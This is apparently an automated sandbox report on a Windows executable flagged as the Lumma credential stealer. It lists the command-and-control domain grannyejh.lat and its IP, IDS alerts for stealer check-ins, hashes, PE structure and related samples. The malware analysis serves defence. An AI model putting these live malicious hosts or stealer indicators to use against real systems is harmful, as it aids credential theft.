                                                                                https://grannyejh.lat/NHEXQatKdE.exe, 00000004.00000003.2718890653.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640272191.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923799804.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2718255542.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2924163388.0000000003526000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2560537533.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2560924415.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2560508442.0000000000F54000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640792581.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiNHEXQatKdE.exe, 00000004.00000003.2494211477.0000000003499000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#NHEXQatKdE.exefalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://ocsp.rootca1.amazontrust.com0:NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://grannyejh.lat/ENHEXQatKdE.exe, 00000004.00000003.2718890653.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640272191.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923799804.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2718255542.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2640792581.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://www.ecosia.org/newtab/NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brNHEXQatKdE.exe, 00000004.00000003.2493814960.00000000037BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.microsoft.NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_NHEXQatKdE.exe, 00000004.00000003.2494211477.0000000003499000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://ac.ecosia.org/autocomplete?q=NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yNHEXQatKdE.exefalse
                                                                                                      high
                                                                                                      http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zNHEXQatKdE.exefalse
                                                                                                        high
                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3NHEXQatKdE.exe, 00000004.00000003.2555793950.0000000003492000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2551489423.0000000003491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?NHEXQatKdE.exe, 00000004.00000003.2492453188.00000000034AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://grannyejh.lat/NNHEXQatKdE.exe, 00000004.00000003.2922757214.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923799804.0000000000F62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://grannyejh.lat:443/apiwNHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://grannyejh.lat/cNHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://contile-images.servNHEXQatKdE.exe, 00000004.00000003.2555793950.0000000003492000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2551489423.0000000003491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://grannyejh.lat/dNHEXQatKdE.exe, 00000004.00000003.2922841372.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000002.2923597402.0000000000F07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=NHEXQatKdE.exe, 00000004.00000003.2288139175.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2288234358.00000000034D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaNHEXQatKdE.exe, 00000004.00000003.2555793950.0000000003492000.00000004.00000800.00020000.00000000.sdmp, NHEXQatKdE.exe, 00000004.00000003.2551489423.0000000003491000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                172.67.179.109
                                                                                                                grannyejh.latUnited States
                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1577899
                                                                                                                Start date and time:2024-12-18 21:21:27 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 5m 26s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:7
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:NHEXQatKdE.exe
                                                                                                                renamed because original name is a hash value
                                                                                                                Original Sample Name:1af7854a5ad5a97c01e2217cdf0f7656.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@6/0@2/1
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 66.7%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 93%
                                                                                                                • Number of executed functions: 37
                                                                                                                • Number of non-executed functions: 97
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target NHEXQatKdE.exe, PID 5576 because there are no executed function
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • VT rate limit hit for: NHEXQatKdE.exe
                                                                                                                TimeTypeDescription
                                                                                                                15:22:23API Interceptor9x Sleep call for process: NHEXQatKdE.exe modified
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                172.67.179.109pPizCGDvrx.exeGet hashmaliciousLummaCBrowse
                                                                                                                  D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                          0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                            Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                              random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    grannyejh.lat3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                    • 104.21.64.80
                                                                                                                                    pPizCGDvrx.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.64.80
                                                                                                                                    Z1jUFmrTua.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    random.exe.7.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    CLOUDFLARENETUS3DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                    • 104.21.64.80
                                                                                                                                    pPizCGDvrx.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    tasktow.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.1.82
                                                                                                                                    https://www.asda.com@hnvs.xyz/asda-christmas-prizesGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.66.47.201
                                                                                                                                    TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 104.21.24.223
                                                                                                                                    QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                    • 172.64.41.3
                                                                                                                                    Payment_Failure_Notice_Office365_sdf_[13019].htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 104.17.25.14
                                                                                                                                    R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.64.41.3
                                                                                                                                    D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    https://vCyA.warmickmak.ru/PrEvJj/Get hashmaliciousUnknownBrowse
                                                                                                                                    • 104.17.25.14
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e13DI3mOIlxE.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    pPizCGDvrx.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    TUp6f2knn2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    sqJIHyPqhr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    k6A01XaeEn.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    • 172.67.179.109
                                                                                                                                    No context
                                                                                                                                    No created / dropped files found
                                                                                                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):7.906638959287093
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:NHEXQatKdE.exe
                                                                                                                                    File size:723'584 bytes
                                                                                                                                    MD5:1af7854a5ad5a97c01e2217cdf0f7656
                                                                                                                                    SHA1:fad9ae35e40778bbe36cff4f28a3e31a3fbc58c3
                                                                                                                                    SHA256:2b843617d9fef8997fa434d68a2338dfb3da3550ceefb638f5e683a4e666693a
                                                                                                                                    SHA512:73e207fe18eb79543b960a5bd3fe1994220bd0ec2efce9f3c484a57ecd4988feaecc35df3163cb3d6f4aad42f9831d3fb82907d75f704ad51a72d232199d2d81
                                                                                                                                    SSDEEP:12288:0ZOOIkzlNMs6FQNN2Z88zQyHHmSPlFaHx6FQNN2Z88zQyHHmSPlFaHClr7v:NOIkTMbFQNNqQyHHmmlFaHMFQNNqQyHX
                                                                                                                                    TLSH:65F4120AB5D280F1D8F21E3519B0CAA198BDD2346F508FEF33D809669FB47D1123D96A
                                                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....zag.........."......4..........n.............@..........................@............@.....................................P..
                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                    Entrypoint:0x401e6e
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:true
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows cui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x67617A10 [Tue Dec 17 13:18:08 2024 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:6
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:6
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:6
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:21f765297fa9653ef21199b37f81eeb8
                                                                                                                                    Signature Valid:false
                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                    Error Number:-2146869232
                                                                                                                                    Not Before, Not After
                                                                                                                                    • 30/08/2023 20:00:00 30/08/2026 19:59:59
                                                                                                                                    Subject Chain
                                                                                                                                    • CN=Privacy Technologies OU, O=Privacy Technologies OU, S=Harjumaa, C=EE
                                                                                                                                    Version:3
                                                                                                                                    Thumbprint MD5:AD1BCBF19AE2F91BB114D33B85359E56
                                                                                                                                    Thumbprint SHA-1:141D90A1BA8F61863FBEDDF7DD1D66C1D1E0B128
                                                                                                                                    Thumbprint SHA-256:A08EA2A7A257AD690B988446951E9DEF2986A2F3F546B6F0902805330F3B6B48
                                                                                                                                    Serial:00D0461B529F67189D43744E9CEFE172AE
                                                                                                                                    Instruction
                                                                                                                                    call 00007F5F0526994Ah
                                                                                                                                    jmp 00007F5F05269569h
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                    call 00007F5F052696FFh
                                                                                                                                    neg eax
                                                                                                                                    pop ecx
                                                                                                                                    sbb eax, eax
                                                                                                                                    neg eax
                                                                                                                                    dec eax
                                                                                                                                    pop ebp
                                                                                                                                    ret
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    cmp dword ptr [0041D2A0h], FFFFFFFFh
                                                                                                                                    push dword ptr [ebp+08h]
                                                                                                                                    jne 00007F5F052696F9h
                                                                                                                                    call 00007F5F0526D54Dh
                                                                                                                                    jmp 00007F5F052696FDh
                                                                                                                                    push 0041D2A0h
                                                                                                                                    call 00007F5F0526D4D0h
                                                                                                                                    pop ecx
                                                                                                                                    pop ecx
                                                                                                                                    xor ecx, ecx
                                                                                                                                    test eax, eax
                                                                                                                                    cmove ecx, dword ptr [ebp+08h]
                                                                                                                                    mov eax, ecx
                                                                                                                                    pop ebp
                                                                                                                                    ret
                                                                                                                                    push 00000008h
                                                                                                                                    push 0041B430h
                                                                                                                                    call 00007F5F05269C2Eh
                                                                                                                                    and dword ptr [ebp-04h], 00000000h
                                                                                                                                    mov eax, 00005A4Dh
                                                                                                                                    cmp word ptr [00400000h], ax
                                                                                                                                    jne 00007F5F0526974Fh
                                                                                                                                    mov eax, dword ptr [0040003Ch]
                                                                                                                                    cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                    jne 00007F5F0526973Eh
                                                                                                                                    mov ecx, 0000010Bh
                                                                                                                                    cmp word ptr [eax+00400018h], cx
                                                                                                                                    jne 00007F5F05269730h
                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                    mov ecx, 00400000h
                                                                                                                                    sub eax, ecx
                                                                                                                                    push eax
                                                                                                                                    push ecx
                                                                                                                                    call 00007F5F05269872h
                                                                                                                                    pop ecx
                                                                                                                                    pop ecx
                                                                                                                                    test eax, eax
                                                                                                                                    je 00007F5F05269719h
                                                                                                                                    cmp dword ptr [eax+24h], 00000000h
                                                                                                                                    jl 00007F5F05269713h
                                                                                                                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                    mov al, 01h
                                                                                                                                    jmp 00007F5F05269711h
                                                                                                                                    mov eax, dword ptr [ebp-14h]
                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                    xor ecx, ecx
                                                                                                                                    cmp dword ptr [eax], C0000005h
                                                                                                                                    sete cl
                                                                                                                                    mov eax, ecx
                                                                                                                                    ret
                                                                                                                                    mov esp, dword ptr [ebp-18h]
                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1aaf00x50.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f0000xe8.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xadc000x2e80.bss
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000x1104.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x151700xc0.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1ac700x130.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x133470x134006d89a97965264aa303718e1047ceed5aFalse0.6077643060064936data6.652018864290896IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x150000x69d40x6a007975814b27f5305afaa4ae2451474f40False0.47162441037735847data5.167894945532914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x1c0000x19b80x100021ca70d79da8e11896608cf64484f9d4False0.466796875data4.806314076439111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .ext0x1e0000x530x2001397a12727ddad9d37e4ee639b13e495False0.173828125data1.4093403317208462IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rsrc0x1f0000xe80x200e4b2b3496c80cd736aa5918f624610b3False0.306640625data2.337865625306241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .reloc0x200000x11040x120073926e461be0cdaa888155118c22b90fFalse0.7777777777777778data6.401085059562283IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                    .bss0x220000x488000x48800183b1708cdcba3739315eeab36f60a86False1.0003401131465517data7.999335620946436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .bss0x6b0000x488000x48800183b1708cdcba3739315eeab36f60a86False1.0003401131465517data7.999335620946436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    RT_MANIFEST0x1f0600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                                                                    DLLImport
                                                                                                                                    ADVAPI32.dllCryptContextAddRef
                                                                                                                                    GDI32.dllCloseFigure
                                                                                                                                    KERNEL32.dllCloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States
                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2024-12-18T21:22:24.862868+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.6594381.1.1.153UDP
                                                                                                                                    2024-12-18T21:22:25.007446+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.6644641.1.1.153UDP
                                                                                                                                    2024-12-18T21:22:26.557736+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649714172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:26.557736+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649714172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:31.213368+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649714172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:31.213368+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649714172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:32.441063+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.649726172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:32.441063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649726172.67.179.109443TCP
                                                                                                                                    2024-12-18T21:22:35.354788+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649726172.67.179.109443TCP
